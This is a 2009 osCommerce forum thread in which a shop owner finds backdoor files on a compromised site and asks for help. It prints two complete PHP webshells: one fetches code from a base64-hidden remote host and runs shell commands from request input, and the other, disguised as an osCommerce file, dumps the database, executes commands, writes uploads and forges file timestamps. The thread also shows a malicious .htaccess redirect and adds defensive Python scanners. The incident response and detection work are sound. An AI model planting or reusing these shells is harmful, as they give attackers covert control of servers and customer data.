Guest, posted December 7, 2009

I've spent my weekend trying to clean up my website and get rid of files and old contribs I don't use. Along the way, I discovered two 'interesting' looking files in my catalog > includes > languages folder that didn't look right. Includes.php was one. Never heard of such a file. I looked at it and realized something was wrong. Mind you, my website is humming along just fine. Looks great, no error messages, getting sales, nothing appears to be wrong.

This is the content of that includes.php file:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

Panicked. Wrote to the webhost. They scanned my entire site and found about 50 more just like it... everywhere from the images folder to you name it. Strange-looking .htaccess files were also created. I've been deleting files all night.

My question is: how does someone access the site to do that? And... why? Can someone decode the above file and explain what the point was? According to the webhost... they've been there since April. I am mortified.

I've changed my password to Cpanel. It was a tough one, too. Upper case, lower case, numbers. Struggling to figure out how to change my Admin username and password... any help would be appreciated on that front!

Lastly, what can I do... aside from changing passwords... to prevent this in the future?
I already have Sitemonitor installed. Must admit... I never used it much. I will run it like clockwork now. I have IP Trap installed. Anything else? I'm running version 2.2.

- Andrea
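The posted includes.php has a recognisable shape: errors are silenced, a base64 literal is decoded and handed straight to include_once (so the code that actually runs lives on a remote host, with the visitor's IP and the requested URL appended to the query string), and if that fetch fails it falls back to running whatever arrives in a GET parameter through system() and to printing the output of `uname -a`. The script below is an added example, not from this thread or from SiteMonitor: a small Python indicator scanner for PHP source that looks for exactly those traits and decodes any base64 literal passed to base64_decode() so you can see where an include is pulling code from. The two PHP snippets it scans are constructed for the demo; the suspect one mirrors the structure of the posted file but uses a placeholder URL (example.invalid).

```python
import base64
import re

# Constructed sample files (not the files from the thread): one mimics the
# structure of the dropped includes.php, one is a harmless language file.
SUSPECT_PHP = (
    '<?php error_reporting(0); '
    'if(! @include_once(base64_decode("'
    + base64.b64encode(b"http://example.invalid/master.php?r_addr=").decode()
    + '") . $_SERVER["REMOTE_ADDR"])) { '
    'if(isset($_GET["cmd"])){system($_GET["cmd"]);} '
    'print "sys_active". `uname -a`; } ?>'
)
BENIGN_PHP = (
    '<?php define("HEADER_TITLE_TOP", "Top"); '
    'define("HEADER_TITLE_CATALOG", "Catalog"); ?>'
)

# Each indicator is a name and a regex over PHP source. None of them is proof
# on its own; together they are the shape of a remote-include backdoor.
INDICATORS = [
    ("silenced_errors", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("include_from_base64", re.compile(r"include(?:_once)?\s*\(\s*base64_decode\s*\(")),
    ("request_to_shell", re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST)\b")),
    ("backtick_exec", re.compile(r"`[^`]+`")),
]
# A quoted base64 literal (16+ chars) given directly to base64_decode().
B64_LITERAL = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]{16,})["\']')


def decode_b64_literals(src):
    """Return every base64 literal fed to base64_decode(), decoded if it is printable text."""
    out = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out


def scan_php(src):
    """Return the indicator names matched in src plus any decoded base64 literals."""
    hits = [name for name, rx in INDICATORS if rx.search(src)]
    decoded = decode_b64_literals(src)
    # A decoded literal that is a URL means code is being pulled from elsewhere.
    if any(t.startswith(("http://", "https://")) for t in decoded):
        hits.append("remote_code_url")
    return {"indicators": hits, "decoded": decoded}


if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_PHP), ("benign", BENIGN_PHP)):
        print(label, scan_php(src))
```

Pointed at a real tree, scan_php() would be called on each .php file's contents; a hit on remote_code_url or request_to_shell is worth a manual look every time, while silenced_errors alone is common in legitimate code and should only raise the score. Applying the same decoding step to the literal in the posted file shows the remote URL that include_once was fetching on every request, which is why the shop kept working normally while it was infected.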
Jack_mcs, posted December 7, 2009

With that many files changed, it was probably done via the recently found security hole with the filemanager. That and other fixes can be found in these threads. If they did use that method of getting in, or maybe even if they didn't, they probably inserted some code that your searches may not find. If you decode the hacker code, as described in some of the above threads, you can determine what files they are using. Or, you can run the hacker test in SiteMonitor. It might be more work but it will find them. In the least, you need to delete the admin/file_manager.php file.

Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons: Get the latest versions of my addons. Recommended SEO Addons.
Guest, posted December 7, 2009

Hi Jack, Thank You for replying. I installed Sitemonitor 1.8 a while back. Upgraded to 1.9 while waiting to hear back from the webhost. You mention running 'the hacker test' in Sitemonitor. I've deleted all the files my webhost found when they scanned my site, but the hacker test came up with this list:

admin/htmlarea/editor_advanced.js
admin/htmlarea/editor_basic.js
admin/htmlarea/popups/insert_image.html
boards/includes/usercp_confirm.php
boards/templates/subSilver/posting_topic_review.tpl
images/table_background_info.php
includes/modules/payment/paypal_ipn.php

I've looked at images/table_background_info.php and this is what I get:

<?php
/*
$Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2003 osCommerce
Released under the GNU General Public License
*/
define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL", chr(10));
define("CRNL", chr(13).chr(10));
$licence = "SBZRRRO7";
if (!isset($_POST['K']) || $licence != $_POST['K']) {
header("Status: 404 Not Found");
header("HTTP/1.0 404 Not Found");
$in = rand(10000000, 99999999);
$fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
if ($fp) {
$name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
$out = "GET ".$name." HTTP/1.1".CRNL;
$out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
$out .= "Connection: Close".CRNL.CRNL;
fwrite($fp, $out);
while (!feof($fp)) { $data2save .= fgets($fp, 128); }
@fclose($fp);
if (strstr($data2save, CRNL.CRNL)) {
$data2save = substr(strstr($data2save, CRNL.CRNL), 4);
$data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
}
}
die();
}
header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");
set_time_limit(99999999999);
ini_set('memory_limit', -1);
clearstatcache();
function dbc() {
if (is_file("../includes/configure.php")) { @include ("../includes/configure.php"); }
else if (is_file("includes/configure.php")) { @include ("includes/configure.php"); }
if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;
if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;
if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;
if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;
$MYL = mysql_connect($MYH, $MYU, $MYP);
mysql_select_db($MYD);
return array($MYL, $MYH, $MYU, $MYP, $MYD);
}
if (isset($_POST['P'])) {
die("A11");
} else if (isset($_POST['MYST'])) {
list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
$tables = "";
$res = mysql_query("SHOW TABLES");
while ($row = mysql_fetch_array($res)) {
$resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
$rowCounts = @mysql_fetch_array($resCounts);
$tables .= "|:|".$row[0].":".$rowCounts[0].NL;
}
echo $tables;
mysql_close($MYL);
die("#done");
} else if (isset($_POST['MYSD'])) {
list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
$list = "";
$res = mysql_query("SHOW DATABASES");
while ($row = mysql_fetch_array($res)) { $list .= "|:|".$row[0].NL; }
echo $list;
mysql_close($MYL);
die("#done");
} else if (isset($_POST['MYFR'])) {
list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
if (substr($_POST['MYC'], 0, 1) == 0) {
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
$row = @mysql_fetch_array($res);
echo $row[1].";".NL;
}
$res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
if (@mysql_num_rows($res) > 0) {
while (($row = @mysql_fetch_array($res))) {
$keys = @implode("`, `", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = mysql_escape_string($v); }
$values = @implode("', '", $values);
echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
}
}
mysql_close($MYL);
die("#done");
} else if (isset($_POST['MYINF'])) {
$inf = dbc();
unset($inf[0]);
die(implode("|:|", $inf));
} else if (isset($_POST['E'])) {
@exec($_POST['E'], $output, $retCode);
die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
} else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) {
if (strlen($_POST['U']) == $_POST['US']) {
ignore_user_abort(true);
$fpSave = fopen($_POST['UF'], "w");
fwrite($fpSave, base64_decode($_POST['U']));
fclose($fpSave);
ignore_user_abort(false);
}
}
if (isset($_POST['T']) || isset($_POST['UF'])) {
if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T'];
$t = array();
$d = dir(".");
$mt = 0;
while (false !== ($e = $d->read())) {
$nt = filemtime($e);
if ($nt > $mt) $mt = $nt;
if (preg_match("~table_background~", $e)) { $t[0][] = $nt; } else { $t[1][] = $nt; }
}
$d->close();
if (count($t[0]) > 0) $tc = 0; else $tc = 1;
sort($t[$tc]);
if (count($t[$tc]) > 0) {
@touch($f, $t[$tc][floor(count($t[$tc]) / 2)]);
@touch("./", $mt);
}
}
?>

I'm 'looking' at the paypal ipn file and don't see anything in particular... which means nothing. What do you think of the file I just posted? I'm unfamiliar with all of them, except the paypal file.
- Andrea
Jack_mcs, posted December 7, 2009

It's a hacker file. There shouldn't be any files in the images directory other than image files and maybe a .htaccess file. The boards/includes/usercp_confirm.php is suspect too but that directory isn't standard oscommerce so it's difficult to say. For the others, there's really no way to know for sure if you are not familiar with what to look for other than comparing them with a known good copy.

The best approach to a problem like this is to have the host restore the complete shop directory. You can tell from the datestamp on the hacked files when it happened and if they have a backup from before then, just replacing them all will fix all such problems. Tell them to be sure not to restore the database and there shouldn't be any problems. Once the restore is done, no matter how you do it, you should create a complete copy on your computer so there is something to compare against and to restore from if something like this happens again.
Guest, posted December 7, 2009

Thanks for all of your help, Jack. I deleted admin/filemanager.php as you suggested. Renamed the Admin folder to something ridiculous and changed the admin/includes/configure file. Changed my password to Cpanel, changed the username and password on my 'admin' folder. All of the hacker files have been deleted. Those entries for the 'boards'... that folder is something I installed ages ago and never used. It was a message forum. So, I just chucked the entire folder.

Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in.

The hacker also inserted a number of .htaccess files in the folders which contained hacker files. Here's an example of the content of one of them:

Options -MultiViews
ErrorDocument 404 //catalog/images/gt_interactive/base.php

The file base.php, of course, being a hacker file. Counted eleven new .htaccess files. Deleted them all.

I'm not going to go the restore route with the webhost as I really don't want to and fear it might create new problems. I'm always messing around with the website, changing things and trying new things. I think I have manually deleted all the hacker files and the hacker test in Sitemonitor is not showing anymore files. Hopefully, all I've done is all that needs to be done.

- Andrea
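Jack's advice above is to compare the shop against a known good copy, and Andrea's post shows the two things that kept turning up in her clean-up: PHP files dropped into images/ and .htaccess files whose ErrorDocument routes 404s to one of those scripts (so the shell gets executed by requesting any non-existent path in that folder). The script below is an added example, not from this thread, from SiteMonitor or from osCommerce: it builds a SHA-256 manifest of a clean copy, diffs a live tree against it (added, modified, missing), and separately flags the two patterns just named. The demo() function builds both trees in temporary directories with constructed contents, including a stand-in .htaccess modelled on the one Andrea posted but pointing at a placeholder path.

```python
import hashlib
import os
import re
import tempfile

# An .htaccess line such as "ErrorDocument 404 /some/path/base.php" hands
# every 404 in that directory to a PHP script; in a legitimate shop that
# target is an HTML page, not PHP.
ERRORDOC_TO_PHP = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S+\.php\b", re.M | re.I)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> sha256 for every file under root (e.g. the known-good copy)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def compare(baseline, live_root):
    """Report files added, modified or missing in live_root relative to the baseline manifest."""
    live = build_manifest(live_root)
    return {
        "added": sorted(set(live) - set(baseline)),
        "modified": sorted(p for p in live if p in baseline and live[p] != baseline[p]),
        "missing": sorted(set(baseline) - set(live)),
    }


def suspicious_files(root):
    """Flag PHP under images/ and .htaccess files that route ErrorDocument to a PHP script."""
    flagged = []
    for rel in build_manifest(root):
        full = os.path.join(root, rel)
        if rel.startswith("images/") and rel.endswith(".php"):
            flagged.append((rel, "php_in_images"))
        elif os.path.basename(rel) == ".htaccess":
            with open(full, encoding="utf-8", errors="replace") as f:
                if ERRORDOC_TO_PHP.search(f.read()):
                    flagged.append((rel, "errordocument_to_php"))
    return sorted(flagged)


def write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


def demo():
    """Constructed shop trees: a clean copy and a 'live' copy with one edit and two dropped files."""
    good = tempfile.mkdtemp()
    live = tempfile.mkdtemp()
    for root in (good, live):
        write(root, "includes/configure.php", "<?php define('DB_SERVER', 'localhost'); ?>")
        write(root, "images/logo.gif", "GIF89a")
    write(live, "includes/configure.php", "<?php define('DB_SERVER', 'localhost'); /* edited */ ?>")
    write(live, "images/table_background_info.php", "<?php /* constructed stand-in, not a real shell */ ?>")
    write(live, "images/.htaccess", "Options -MultiViews\nErrorDocument 404 //catalog/images/placeholder.php\n")
    return compare(build_manifest(good), live), suspicious_files(live)


if __name__ == "__main__":
    diff, flagged = demo()
    print(diff)
    print(flagged)
```

In practice the manifest is built once from the local copy Jack recommends keeping, stored away from the web root, and compare() is run against the live tree on a schedule; an "added" entry under images/ or any "modified" PHP file is the cue to look before anything else. The mtime-copying code at the end of the posted table_background_info.php is precisely why a datestamp-based comparison alone is not enough and hashes are used here instead.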
Jack_mcs, posted December 7, 2009

Quoting Andrea: "Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in."

If they got in using the file_manager.php file, they didn't need a login. It let them bypass it. If they got in some other way, you may never know. In order to know, or at least make an intelligent guess, you would need the server logs, the time they did it and probably their IP. It usually isn't worth the effort unless they were getting in over and over. I think the problem was the file manager and with the changes you made, it should be OK now.